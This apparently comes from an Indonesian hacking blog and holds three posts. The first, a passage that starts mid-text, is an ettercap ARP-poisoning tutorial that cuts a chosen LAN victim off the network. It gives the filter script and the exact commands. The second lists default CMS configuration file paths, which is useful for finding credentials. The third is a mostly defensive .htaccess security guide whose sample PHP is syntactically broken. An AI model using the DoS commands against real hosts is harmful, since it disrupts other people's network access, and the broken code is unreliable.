[02]. Pengertian lain tentang DDOS adalah mengirimkan data secara terus menerus dengan menggunakan satu komputer tidak begitu efektif karena biasanya sumber daya server yang diserang lebih besar dari komputer penyerang [04]. Dari beberapa pengertian di atas dapat disimpulkan bahwa serangan DDOS (Denial Distribute Of Service) sangat merugikan bagi yang diserang, karena serangan ini dapat menghambat kerja pengguna dari komputer korban. Dimana komputer korban menjadi lambat dan sulit untuk diakses akibat dari penuhnya trafik dalam komputer tersebut  Ok Saya rasa Sudah jelas...ok

pertama kita cek dulu korbannya yang akan kita serang
buka terminal ketikkan perintah
arp-a








untuk melihat mangsa

disini korban saya IP 192.168.1.15

langsung saja

gedit

1. Buka Gedit (atau file editor apapun) kemudian tulis perintah di bawah ini
if(ip.src == 'IP_TARGET' || ip.dst == 'IP_TARGET') {
drop();
kill();
msg("DDOS TrojanzBoy !!\n");
}


ganti IP_TARGET dengan IP Address target yang akan diserang kemudian simpan dengan nama dos.eft


 2. Convert file dos.eft menjadi dos.ef
etterfilter dos.eft -o dos.ef

 3. Lakukan serangan
ettercap -T -q -F /root/dos.ef -M ARP /ip_targetmu/ // -i kartu_wireles/lanmu

Jika target/korban mengakses internet maka rto alias not respon



Maka ip tersebut tidak bisa di gunakan lagi.Dan ini adalah hasil dari kelakuan kalian




sekian tutor dari saya

terima kasih ................



Letak config pada CMS

Posted by Fatkhur On Sabtu, 05 Januari 2013 0 komentar



Seperti kita ketahui di mesin Web ada satu file yang dari ukuran cukup kecil tapi punya fungsi begitu fital yaitu file config/configuration/setting. Bisa dibilang file ini merupakan salah satu kendali dari mesin Web. Di dalamnya tersimpan pengaturan konfigurasi, seperti pengaturan database, Security Keys, setingan cookies domain, Disable Post Revisions, cache, pengaturan alokasi memori untuk php dan masih buanyak setingan lainnya
Tapi disini kita akan membahas letak config tersebut pada tiap2 cms

berikut ini beberapa config cms beserta letaknya (default) :

vBulletin -- /includes/config.php
IPB -- /conf_global.php
MyBB -- /inc/config.php
Phpbb -- /config.php
Php Nuke -- /config.php
Php-Fusion -- config.php
SMF -- /Settings.php
Joomla -- configuration.php , configuration.php-dist
WordPress -- /wp-config.php
Drupal -- /sites/default/settings.php
Oscommerce -- /includes/configure.php
e107 -- /e107_config.php
Seditio -- /datas/config.php

semoga bermanfaat

Tutorial penggunaan .htaccess

Posted by Fatkhur On Jumat, 04 Januari 2013 0 komentar

File .htaccess adalah file teks ASCII sederhana yang terletak di direktori www atau di sebuah sub direktori folder www. Anda bisa membuat atau mengedit file ini di Text Editor (Notepad) dan kemudian meng-uploadnya ke direktori yang ingin anda ubah setting-nya. Pastikan bahwa file tersebut diupload dalam format ASCII bukan BINARY, dan pastikan file permission untuk file tersebut telah diset menjadi 644 (rw-r-r–). Hal tersebut memungkinkan server untuk mengakses file tapi mencegah user untuk mengakses file tersebut dari browser mereka.

ntu sedikit penjelasan tentang .htaccess dan pada trit cupu ane kali ini ane ga akan banyak menjelaskan tentang apa dan bagaimana itu file .htaccess, tp beberapa kegunaan file ini yang akan bermanfaat
untuk Security. Okeh langsung cruutz aja yak.. Ngakak

1. Mencegah Akses Ke .htaccess
Tambahkan baris berikut untuk menambah keamanan dari file .htaccess sehingga apabila ada usaha untuk mengakses file tersebut akan muncul pesan kesalahan 403. Tentu saja tidak lupa memberi-kan file permissionnya menjadi 644.

<Files .htaccess>
order allow,deny
deny from all
</Files>

2. Mencegah Akses Ke File Tertentu
Untuk membatasi akses ke file tertentu kita dapat menggunakan perintah berikut.Ganti nama rahasia.txt menjadi sesuai dengan kebutuhan anda.Nantinya file tersebut akan disembunyikan dan apa-bila terdapat usaha untuk mengakses file tersebut akan terjadi error 403.

<files rahasia.txt>
order allow,deny
deny from all
</files> 

3. Mencegah Akses Ke Banyak File
Kita bisa mengganti beberapa extension dibawah sesuai dengan yang kita butuhkan.

<FilesMatch "\.(htaccess|htpasswd|ini|phps|fla|psd|log|sh)$">
Order Allow,Deny
Deny from all
</FilesMatch> 
4. Mencegah User Melakukan Browsing Pada Setiap Direktori Server Kita
Options All -Indexes 
4.1. Mengijinkan User Melakukan Browsing
Jika mengijinkan user untuk melakukan browsing pada “direktori yang telah kita tentukan” cukup menambahkan perintah seperti dibawah ini.(Cukup tempatkan file .htaccess pada folder yang diinginkan)

Options All +Indexes 
4.2. Mencegah User Melakukan Browsing Tanpa Pesan Error 403
IndexIgnore * 
4.3. Mencegah User Melakukan Browsing Dengan Membatasi Extension File.
IndexIgnore *.wmv *.mp4 *.avi *.etc 
5. Mengubah Index File
Secara default apabila kita membuat beberapa file dan salah satunya terdapat index file, maka file tersebutlah yang akan dijalankan terlebih dahulu. Dengan menggunakan .htaccess kita dapat merubah-nya menjadi nama file yang kita inginkan.

DirectoryIndex penggantiindex.php 
6. Menyamarkan Extension PHP
 Ini sangat berguna untuk menambahkan keamanan pada aplikasi PHP yang anda buat. anda bisa mengganti extension php pada aplikasi anda dengan extension yang telah anda daftarkan, Mungkin “LOL”, “hacking”, dll. Nah dengan kode berikut, file tersebut akan tetap dibaca sebagai file PHP. Sedikit catatan, biasanya saya mencari file httpd.conf dan menambahkan extensionnya disitu, akan tetapi inilah kelebihan .htaccess. Kita tidak perlu merubah settingan asli pada Apache.

AddType application/x-httpd-php .hacking 
7. Membatasi Akses Ke LAN (Local Area Network)
<Limit GET POST PUT>
order deny,allow
deny from all
allow from 192.168.1.5
</Limit> 

7.1. Bisa Menambahkan Domain
<Limit GET POST PUT>
order allow,deny
allow from all
deny from 192.168.1.5
deny from .*domain\.com.*
</Limit> 
 8. Mencegah Hotlinking
Hotlinking merupakan pencurian bandwidth melalui penggunaan sebuah image yang akan dipasang pada suatu halaman pada website lain, sehingga bandwidth dari website asal akan tersedot bila image yang dipasang pada website lain itu dibuka.Atau secara simple bisa diterjemahkan, ada orang lain yang mengkopi link image dari website kita dan menempatkannya pada website miliknya.Memang tidak terlalu banyak memakan bandwith akan tetapi hal ini cukup mengganggu dan mungkin kita bisa memberi sedikit pelajaran kepada si Pelaku :D. Kita akan melakukan beberapa praktek ringan.
a. Ketik kode berikut dan simpan dengan nama gambar.php
PHP Code:
<?php
  $pic strip_tags$_GET['pic'] );
  if ( ! $pic ) {
    die("Gambar Tidak Ditemukan");
  }
?>
<html>
<head>
<title><?php echo($pic); ?></title>
</head>
<body>
<p>
  <img src="/<?php echo($pic); ?>" alt="Test Hotlinking">
</p>
</body>
</html>
b. Siapkan gambar dengan nama terserah.jpg
c. Upload kedua file tersebut ke server hosting ente.
d. Buka browser dan ketik URL sebagai berikut
http://websiteente.com/gambar.php?pic=terserah.jpg

Bila hanya seperti ini orang lain bisa saja melakukan Copy Image URL untuk menampilkannya di website miliknya dg kode bgini:
http://websiteente.com/terserah.jpg
Nah untuk mencegah hal itu terjadi maka kita harus menyiapkan file .htaccess yang berisi baris-baris seperti ini:
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} .*jpg$|.*gif$|.*png$ [NC]
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !websitekamu\.com [NC]
RewriteCond %{HTTP_REFERER} !websiteteman\.com [NC]
RewriteCond %{HTTP_REFERER} !google\. [NC]
RewriteCond %{HTTP_REFERER} !search\?q=cache [NC]
RewriteRule (.*) /gambar.php?pic=$1
Maka ketika seseorang melakukannya lagi maka dia tidak akan mendapatkan hasil apa-apa.
9. Memberikan Password Pada File
<Files rahasia.php>
AuthType Basic
AuthName "Prompt"
AuthUserFile /home/path/.htpasswd
Require valid-user
</Files> 
9.1. Memberikan Password Pada Banyak File
<FilesMatch "^(execute|index|secure|insanity|biscuit)*$">
AuthType basic
AuthName "Development"
AuthUserFile /home/path/.htpasswd
Require valid-user
</FilesMatch>

9.2. Memberikan Password Pada Direktori Dimana .htaccess Berada
resides
AuthType basic
AuthName "This directory is protected"
AuthUserFile /home/path/.htpasswd
AuthGroupFile /dev/null
Require valid-user
10. Otomatis Memberikan CHMOD Kepada Setiap File
chmod .htpasswd files 640
chmod .htaccess files 644
chmod php files 600 
11. Melindungi Dari Serangan DOS ( Denial Of Service ) Dengan Membatasi Upload File
Ini adalah salah satu metode sederhana yang bisa kita gunakan untuk mencegah serangan DOS. Disini kita membatasi ukuran upload sebesar 10240000 byte yang setara dengan 10 mb.

LimitRequestBody 10240000 
12. Mengamankan Direktori Dari Pengeksekusian Script Atau File
AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi
Options -ExecCGI 
hmmh... segitu dulu deh,, Capek moga bermanfaat yah Bigsmile